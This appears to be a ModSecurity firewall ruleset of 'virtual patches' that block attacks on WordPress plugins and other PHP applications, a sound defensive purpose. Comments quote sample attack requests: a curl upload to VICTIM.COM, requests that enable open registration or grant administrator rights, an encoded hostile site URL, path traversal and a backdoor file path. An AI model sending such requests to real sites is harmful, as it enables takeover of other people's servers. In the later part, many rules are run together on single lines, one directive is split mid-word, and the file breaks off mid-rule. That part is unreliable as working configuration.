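SecRule REQUEST_URI "html2canvasproxy\.php" "chain,phase:2,deny,log,auditlog,id:393749,rev:1,t:none,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress html2canvas proxy SSRF attack blocked',severity:2"
SecRule ARGS:url "^http" "t:none,t:urlDecodeUni,t:lowercase"

#WP admin.php vulnerabilities
# Gate: rules up to END_WP_PHP_ADMIN only run for wp-admin/admin.php.
SecRule REQUEST_FILENAME "wp-admin/admin\.php" "id:322199,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:322198,t:none,pass,nolog,noauditlog,skipAfter:END_WP_PHP_ADMIN"
SecRule ARGS:page "wpfm-admin" "chain,phase:2,id:322314,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP AccessPress Themes attack (CVE-2020-25378)',severity:2"
SecRule ARGS:id "\"" "t:none,t:UrlDecodeUni"
SecRule ARGS:page "recall-add" "chain,phase:2,id:322313,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP recall products plugin XSS attack (CVE-2020-25380)',severity:2"
SecRule ARGS:/recall/ "<(?:javascript|script|about|applet|activex|chrome)" "t:none,t:UrlDecodeUni,t:removewhitespace,t:lowercase"
SecRule ARGS:repeater "'" "chain,phase:2,id:322111,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress Load More SQL injection attack',severity:2"
SecRule ARGS:page "ajax-load-more-repeaters" "t:none,t:urlDecodeUni,t:lowercase"
SecRule ARGS:page "mediafromftp-search-register" "chain,phase:2,id:322122,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP Medoa Recursion attack',severity:2"
SecRule ARGS_POST:searchdir "\.\./\.\." "t:none,t:urlDecodeUni,t:normalizePath"
SecMarker END_WP_PHP_ADMIN

# Gate: rules up to END_WP_LOGIN only run for wp-login.php.
SecRule REQUEST_FILENAME "wp-login\.php" "id:314895,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:314896,t:none,pass,nolog,noauditlog,skipAfter:END_WP_LOGIN"
#Possible WP brute force login attempt
# Log-only (pass) rule: POST to wp-login.php without a Referer header.
# NOTE(review): the final link tests RESPONSE_STATUS, but this chain runs in
# phase:2, before any response exists, so that link cannot match and the rule
# appears never to log. Either move the chain to a response phase or drop the
# RESPONSE_STATUS link -- confirm the intended behaviour first.
SecRule REQUEST_METHOD "@streq POST" "chain,id:393666,phase:2,t:none,pass,auditlog,log,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Wordpress brute force attempt, direct Login Missing Referer (not blocked)',rev:4,severity:4,tag:'no_ar'"
SecRule REQUEST_FILENAME "/wp-login\.php" "chain,t:none,t:lowercase,t:urlDecodeUni"
SecRule &REQUEST_HEADERS:Referer "@eq 0" "t:none,chain"
SecRule RESPONSE_STATUS "200"
# Log-only (pass) rule: non-empty log and pwd fields plus a script-like tag in
# any argument.
SecRule ARGS:log "!@rx ^$" "chain,id:323667,phase:2,t:none,pass,auditlog,log,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP XSS in Loginizer attack (CVE-2018-11366)',severity:2"
SecRule ARGS:pwd "!@rx ^$" "chain,t:none"
SecRule ARGS "<(?:javascript|script|about|applet|activex|chrome)" "t:none,t:htmlEntityDecode,t:removewhitespace,t:lowercase"
SecMarker END_WP_LOGIN

#admin-ajax vulnerabilities
# Gate: rules up to END_PHP_ADMIN_AJAX (marker is beyond this excerpt) only run
# for admin-ajax.php and admin-post.php.
SecRule REQUEST_FILENAME "admin-(?:ajax|post)\.php" "id:334895,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:373421,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_ADMIN_AJAX"
SecRule REQUEST_METHOD "POST" "id:356710,rev:1,phase:2,t:none,chain,status:403,deny,log,auditlog,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress PHP Anywhere < 3.0.0 - Remote Code Execution',severity:2"
SecRule ARGS:action "parse-media-shortcode" "t:none,t:urlDecodeUni,t:lowercase,chain"
SecRule ARGS:shortcode "\[php_everywhere\]" "t:none,t:urlDecodeUni,t:lowercase"
SecRule ARGS:wcuf_current_upload_session_id "(?:\.\./\.\.|ph(?:p|tml|t))" "phase:2,id:322182,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WooCommerce Unauthenticated Arbitrary File Upload attack',severity:2"
#phphp
SecRule ARGS:wcuf_file_name "ph(?:p|tml|t)" "phase:2,id:322183,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WooCommerce Unauthenticated Arbitrary File Upload attack',severity:2"
SecRule ARGS:action "gdlr_lms_cancel_booking" "phase:2,id:322102,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SQL Injection attack against WP Good Layers Plugin (CVE-2020-27481)',severity:2,tag:'SQLi'"
# NOTE(review): in the second alternative "(?:javascript|...)*\>" the "*" allows
# zero repetitions, so that branch reduces to a bare ">" and the keyword list
# has no effect; the same pattern is reused in 322222 below. If only tagged
# forms were meant, the quantifier should go -- confirm against upstream.
SecRule ARGS:file[title] "(?:<|(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "phase:2,id:322172,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress Download Manager XSS attack (CVE-2013-7319)',severity:2"
# Elementor icon upload: action, Referer page, JSON body marker and an uploaded
# file with an archive or PHP/HTML extension must all be present.
SecRule ARGS:action "elementor_ajax" "chain,phase:2,id:322112,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Elementor Pro File Upload attack attack',severity:2"
SecRule REQUEST_HEADERS:Referer "post-new\.php\?post_type=elementor_icons" "t:none,t:urlDecodeUni,t:htmlEntityDecode,chain"
SecRule REQUEST_BODY "pro_assets_manager_custom_icon_upload\x22:\{\x22action\x22:\x22pro_assets_manager_custom_icon_upload\x22" "chain,t:none,t:urlDecode,t:htmlEntityDecode,t:compressWhitespace"
SecRule FILES "\.(zip|php\d?|p?html)$" "t:none,t:urlDecodeUni,t:lowercase"
SecRule ARGS:action "dnd_codedropz_upload" "chain,phase:2,id:322113,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Drag and Drop Upload Contact Form Code Injection attack',severity:2"
SecRule &ARGS:upload-file "@ge 1" "chain,t:none"
SecRule ARGS:supported_type|ARGS:filename "%" "t:none,t:urlDecodeUni"
# Widget import with a remote/stream-wrapper URL instead of a local file name.
SecRule ARGS:action "import_widget_data" "chain,phase:2,id:322114,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP Widget Importer/Export RFI attack',severity:2"
SecRule ARGS:name "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?)://" "t:none,t:urlDecodeUni,t:lowercase"
SecRule ARGS:action "mapp_tpl_" "chain,phase:2,id:322115,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: MapPress Maps path recursion attack',severity:2"
SecRule ARGS:name "\.\./\.\." "t:none,t:urlDecodeUni,t:normalizePath"

#action=tnpc_render,b=html
SecRule REQUEST_URI "admin-ajax\.php" "chain,phase:2,deny,log,auditlog,id:383709,rev:1,t:none,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: KingComposer XSS attack blocked',severity:2"
SecRule ARGS:action "kc_install_online_preset" "t:none,t:urlDecodeUni,t:lowercase"
SecRule REQUEST_URI "admin-ajax\.php" "chain,phase:2,deny,log,auditlog,id:322222,rev:1,t:none,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP CommentLuv XSS attack blocked',severity:2"
SecRule ARGS:_ajax_nonce "(?:<|(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
SecRule REQUEST_URI "admin-ajax\.php" "chain,phase:2,deny,log,auditlog,id:303669,rev:1,t:none,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Adning PHP code injection attack blocked',severity:2"
SecRule ARGS:action "_ning_upload_image" "t:none,t:urlDecodeUni,t:lowercase,chain"
SecRule ARGS:allowed_file_types "(?:php|zip)" "t:none,t:urlDecodeUni,t:lowercase"
SecRule REQUEST_URI "admin-ajax\.php" "chain,phase:2,deny,log,auditlog,id:303668,rev:1,t:none,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Adning PHP code injection attack blocked',severity:2"
SecRule ARGS:action "_ning_remove_image" "t:none,t:urlDecodeUni,t:lowercase,chain"
SecRule ARGS:uid "\.\./\.\./\.\." "t:none,t:urlDecodeUni,t:cmdline"
#action=tnpc_render,b=html
SecRule REQUEST_URI "admin-ajax\.php" "chain,phase:2,deny,log,auditlog,id:303768,rev:1,t:none,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Newsletter Plugin attack blocked',severity:2"
SecRule ARGS:action "tnpc_render" "t:none,t:urlDecodeUni,t:lowercase,chain"
SecRule ARGS:b "html" "t:none,t:urlDecodeUni,t:lowercase"
#action=tnpc_render,b=html
SecRule REQUEST_URI "admin-ajax\.php" "chain,phase:2,deny,log,auditlog,id:303769,rev:1,t:none,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Newsletter Plugin PHP objection insertion attack blocked',severity:2"
SecRule ARGS:action "tnpc_render" "t:none,t:urlDecodeUni,t:lowercase,chain"
SecRule ARGS:options[inline_edits] "(<|php|\{)" "t:none,t:urlDecodeUni,t:lowercase"
#/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
# Fix: the sample request above carries "upload_library" in the "action"
# argument, but the last link previously tested ARGS:param a second time; with a
# single "param" argument both links could never match, so the rule was dead.
SecRule REQUEST_URI "admin-ajax\.php" "chain,phase:2,deny,log,auditlog,id:393767,rev:1,t:none,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Arbitrary File Upload Vulnerability in Jssor Slider attack blocked',severity:2"
SecRule ARGS:param "upload_slide" "t:none,t:urlDecodeUni,t:lowercase,chain"
SecRule ARGS:action "upload_library" "t:none,t:urlDecodeUni,t:lowercase"
#Added if users disable generic wp-config file download protection rules
# NOTE(review): "\../\.." escapes only the first dot of each pair, so it matches
# ".<any>/.<any>"; "\.\./\.\." would be the literal traversal -- confirm intent.
SecRule ARGS:action "duplicator_download" "chain,phase:2,deny,log,auditlog,id:323769,rev:1,t:none,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: wp-config file download attack via duplicator plugin blocked',severity:2"
SecRule ARGS:file "(?:wp-config|\../\..)" "t:none,t:urlDecodeUni,t:lowercase"
#Release granted from encrypted embargo rules 3/4/20
SecRule ARGS:action "sent_gift_certificate" "phase:2,deny,log,auditlog,id:383769,rev:1,t:none,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WooCommerce attack blocked',severity:2"
#/wp-admin/admin-ajax.php?action=subscribe_email&cs_email=1@1
SecRule REQUEST_URI "admin-ajax\.php" "chain,phase:2,deny,log,auditlog,id:393769,rev:1,t:none,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress ajaxServersettingschk command injection attack blocked',severity:2"
SecRule ARGS:cs_email "1@1" "t:none,t:urlDecodeUni"
SecRule REQUEST_URI "admin-ajax\.php" "chain,phase:2,deny,log,auditlog,id:393768,rev:1,t:none,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress ajaxServersettingschk command injection attack blocked',severity:2"
SecRule ARGS:rootuname ";" "t:none,t:urlDecodeUni"
SecRule ARGS:page "^301bulkoptions$" "phase:2,deny,log,auditlog,id:393751,rev:1,t:none,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress 301bulkoptions attack blocked',severity:2"
# Directive name normalised from "Secrule" to "SecRule" (Apache directive names
# are case-insensitive; this is cosmetic) here and in the rules below.
SecRule REQUEST_URI "admin-ajax\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347147,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Wordpress admin-ajax XSS attack',logdata:'%{TX.0}'"
SecRule ARGS:domain "(?:<|>)" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:replaceComments,t:removeNulls,t:removewhitespace,t:lowercase"
SecRule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347148,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Wordpress admin-ajax Live Chat plugin XSS attack',logdata:'%{TX.0}'"
SecRule ARGS:wplc_custom_js "(?:<|script|>)" "t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:replaceComments,t:removewhitespace,t:lowercase"
#$ curl https://VICTIM.COM/wp-admin/admin-ajax.php -F 'action=swpsmtp_clear_log' -F 'swpsmtp_import_settings=1' -F 'swpsmtp_import_settings_file=@/tmp/upload.txt'
# Settings import via clear_log: the import flag must be "1" and the
# settings-file argument must be present (count not "0").
SecRule ARGS:action "swpsmtp_clear_log" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347149,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Wordpress admin-ajax file injection attack',logdata:'%{TX.0}'"
SecRule ARGS:swpsmtp_import_settings "1" "chain,t:none,t:utf8toUnicode,t:urlDecodeUni"
SecRule &ARGS:swpsmtp_import_settings_file "!^0$" "t:none"
#class-donor-table.php
#Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347148,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Wordpress admin-ajax Live Chat plugin XSS attack',logdata:'%{TX.0}'"
#SecRule ARGS:wplc_custom_js "(?:<|script|>)" "t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:replaceComments,t:removewhitespace,t:lowercase"
#action=wpgdprc_process_action&data=%7B%22type%22%3A%22save_setting%22%2C%22append%22%3Afalse%2C%22option%22%3A%22users_can_register%22%2C%22value%22+%3A%221%22%7D&security=
SecRule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347150,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: WordPress GDPR Compliance Plugin Exploit blocked',logdata:'%{TX.0}'"
SecRule ARGS:action "wpgdprc_process_action" "t:none,t:lowercase,chain"
SecRule ARGS:data "(?:administrator|users_can_register|https?)" "t:none,t:lowercase"
#action=kiwi_social_share_set_option&args%5Bgroup%5D=users_can_register&args%5Bvalue%5D=1
# NOTE(review): the next directive continues beyond this excerpt; the trailing
# backslash keeps it joined to its continuation line.
SecRule REQUEST_URI \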
"(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347151,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Kiwi Social Plugin Exploit blocked',logdata:'%{TX.0}'" SecRule ARGS:action "kiwi_social_share_set_option" "t:none,t:lowercase,chain" SecRule ARGS "(?:administrator|users_can_register)" "t:none,t:lowercase" #action=td_ajax_update_panel&wp_option%5Busers_can_register%5D=1 Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347152,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Kiwi Social Plugin Exploit blocked',logdata:'%{TX.0}'" SecRule ARGS:action "td_ajax_update_panel" "t:none,t:lowercase,chain" SecRule ARGS:/wp_option/ "(?:administrator|users_can_register|https?)" "t:none,t:lowercase" #action=td_mod_register&email=master%40createsimpledomain.icu&user=mastericuuu Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347153,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Kiwi Social Plugin Exploit blocked',logdata:'%{TX.0}'" SecRule ARGS:action "td_mod_register" "t:none,t:lowercase" #action=cp_add_subscriber&cp_set_user=administrator&message=hello¶m%5Bemail%5D=master%40createsimpledomain.icu #action=cp_add_subscriber&cp_set_user=administrator&cp_set_user=administrator&message=hello&message=letitbe¶m%5Bemail%5D=master%40createsimpledomain.icu¶m%5Bemail%5D=master%40createsimpledomain.icu #action=cp_add_subscriber&cp_set_user=administrator&message=hello¶m%5Bemail%5D=master%40createsimpledomain.icu #action=cp_add_subscriber&cp_set_user=administrator&cp_set_user=administrator&message=hello&message=letitbe¶m%5Bemail%5D=master%40createsimpledomain.icu¶m%5Bemail%5D=master%40createsimpledomain.icu Secrule 
REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347154,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Kiwi Social Plugin Exploit blocked',logdata:'%{TX.0}'" SecRule ARGS:cp_add_subscriber "td_ajax_update_panel" "t:none,t:lowercase,chain" SecRule ARGS:cp_set_user "administrator" "t:none,t:lowercase" Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347155,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Admin Ajax unauthenticated plugin/extension exploit blocked',logdata:'%{TX.0}'" SecRule ARGS:wplc_custom_js "fromcharcode" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase" Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347156,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Admin Ajax unauthenticated plugin/extension exploit blocked',logdata:'%{TX.0}'" SecRule ARGS:action|ARGS:otw_pctl_action "(?:ewd_ufaq_updateoptions|gen_save_cssfixfront|manage_otw_pctl_options|savegooglecode)" "t:none,t:lowercase,chain" SecRule ARGS:/custom_css/|ARGS:home "fromcharcode" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase" Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347157,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Admin Ajax unauthenticated plugin/extension exploit blocked',logdata:'%{TX.0}'" SecRule ARGS:action "thim_update_theme_mods" "t:none,t:lowercase,chain" SecRule ARGS:thim_value "(?:https?|fromcharcode|script)" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase" #/wp-admin/admin-post.php?yp_remote_get 
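#yp_json_import_data=%5B%7B%22home%22%3A%22aHR0cHM6Ly9kZXN0cm95Zm9ybWUuY29tL3Q%2FdD0xJg%3D%3D%22%7D%5D
# yp_remote_get JSON import that rewrites home/siteurl.
# rev:2 - the documented request sends yp_remote_get as a bare query flag with
# an empty value, which '[0-9a-z]' could never match; the link now tests for
# the parameter's presence instead.
SecRule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347158,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Admin Ajax unauthenticated plugin/extension exploit blocked',logdata:'%{TX.0}'"
    SecRule ARGS:yp_json_import_data "(?:home|siteurl|http)" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,chain"
    SecRule &ARGS:yp_remote_get "@gt 0" "t:none"

# CP_ABC_post_edition with a URL, fromCharCode or script in editionarea.
SecRule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347159,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Admin Ajax unauthenticated plugin/extension exploit blocked',logdata:'%{TX.0}'"
    SecRule ARGS:CP_ABC_post_edition "1" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,chain"
    SecRule ARGS:editionarea "(?:https?|fromcharcode|script)" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase"

#/wp-admin/admin-ajax.php?action=wcp_change_post_width
# wcp_change_* with a URL, fromCharCode or script in width/height.
SecRule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347160,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Admin Ajax unauthenticated plugin/extension exploit blocked',logdata:'%{TX.0}'"
    SecRule ARGS:action "wcp_change" "t:none,t:lowercase,chain"
    SecRule ARGS:width|ARGS:height "(?:https?|fromcharcode|script)" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase"

SecMarker END_PHP_ADMIN_AJAX

#/wp-content/plugins/yuzo-related-post/assets/js/admin.js
# Any access under the yuzo plugin directory is denied.
SecRule REQUEST_URI "/wp-content/plugins/yuzo" "phase:2,deny,log,auditlog,id:382245,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Access attempt or probe for known vulnerable yuzo-related-post Plugin blocked'"

#GET /admin.php?dispatch=auth.login_form&return_url=admin.php
# auth.login_form probe with return_url pointing back at admin.php.
SecRule REQUEST_URI "admin\.php" "chain,phase:2,deny,log,auditlog,id:382241,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: auth.login_form probe blocked'"
    SecRule ARGS:dispatch "auth\.login_form" "t:none,t:urlDecodeUni,t:lowercase,chain"
    S
    ecRule ARGS:return_url "^admin\.php$" "t:none,t:urlDecodeUni,t:lowercase"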
SecRule REQUEST_URI "/movefile\.php" "chain,capture,phase:2,deny,log,auditlog,id:391741,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Roxy File Manager Shell Upload Attack'" SecRule ARGS:n "\.ph(?:p|t)" "t:none,t:urlDecodeUni,t:lowercase" #ehcpbackup.php SecRule REQUEST_URI "/ehcpbackup.php" "capture,phase:2,deny,log,auditlog,id:391739,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Easy Hosting Control Panel plaintext password attack denied'" #/wp-content/plugins/wp-mobile-detector/resize.php?src=.*php SecRule REQUEST_URI "/wp-content/plugins/wp-mobile-detector/resize\.php" "chain,capture,phase:2,deny,log,auditlog,id:391740,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress WP Mobile Detector 3.5 Shell Upload'" SecRule ARGS:src "\.ph(?:p|t)" "t:none,t:urlDecodeUni,t:lowercase" #ehcp/test/up2.php #http:///ehcp/test/upload2.php #http:///ehcp/test/upload.php #http:///ehcp/test/up.php SecRule REQUEST_URI "/ehcp/test/up" "capture,phase:2,deny,log,auditlog,id:391709,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Easy Hosting Control Panel Unauthenticated File upload attack denied'" #http://localhost/pivotx_latest/pivotx/ #index.php?page=media&file=imageshell.png&pivotxsession=ovyyn4ob2jc5ym92&answer= #shell.php SecRule REQUEST_URI "/pivotx/" "chain,capture,phase:2,deny,log,auditlog,id:393739,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PivotX shell upload attack denied'" SecRule ARGS:answer "\.php" "t:none,t:urlDecodeUni,t:lowercase" #admin-logs.php SecRule REQUEST_URI "/admin-logs.php" "chain,capture,phase:2,deny,log,auditlog,id:393738,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - 
Virtual Just In Time Patch: Zenphoto RFI attack denied'" SecRule ARGS:tab "^(?:ogg|tls|gopher|data|php|glob|phar|dict|ssh2|rar|expect|zip|zlib|(?:ht|f)tps?):/" #/php-utility-belt/ajax.php SecRule REQUEST_URI "/php-utility-belt/ajax\.php" "capture,phase:2,deny,log,auditlog,id:393737,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP utility belt access denied'" #ui/js/3rd/plupload/examples/upload.php SecRule REQUEST_URI "ui/js/3rd/plupload/examples/upload\.php" "capture,phase:2,deny,log,auditlog,id:393734,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Yeager CMS unauthenticated upload blocked'" #libs/org/adodb_lite/tests/ SecRule REQUEST_URI "libs/org/adodb_lite/tests/" "chain,capture,phase:2,deny,log,auditlog,id:393721,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Yeager CMS SSRF attack blocked '" SecRule ARGS:dbhost "^(?:127|10|172\.16|192)\." 
"t:none" #/_admin/site.link-list.php SecRule REQUEST_URI "_admin/site\.link-list\.php" "chain,capture,phase:2,deny,log,auditlog,id:393720,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Grawlix 1.0.3: Code Execution '" SecRule FILES|FILES_NAMES "\.ph(?:p|tml|t)$" "t:none,t:urlDecodeUni,t:lowercase,t:removeWhiteSpace" ## multipart/form-data name evasion attempts SecRule REQUEST_URI "kcfinder/browse\.php\?type=image" "chain,capture,phase:2,deny,log,auditlog,id:393719,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CouchCMS 1.4.5: Code Execution attack blocked'" SecRule FILES|FILES_NAMES "\.ph(?:p|tml|t)$" "t:none,t:urlDecodeUni,t:lowercase,t:removeWhiteSpace" #/main_bigware_43.php/main_bigware_79.php SecRule REQUEST_URI "/main_bigware_[0-9]+\.php/main_bigware_[0-9]+\.php" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:364577,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Bigware Shop 2.3.01 File Upload Attack blocked'" #/web/download_file.php?file=../../app/etc/local.xml SecRule REQUEST_FILENAME "web/download_file\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:344577,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Magmi file recursion attack '" SecRule ARGS:file "\.\./\.\./" "t:none,t:urlDecodeUni" #/files/attach/attachement_6/backdoor.php5 SecRule REQUEST_FILENAME "/files/attach/attachement.*/.*\.php" 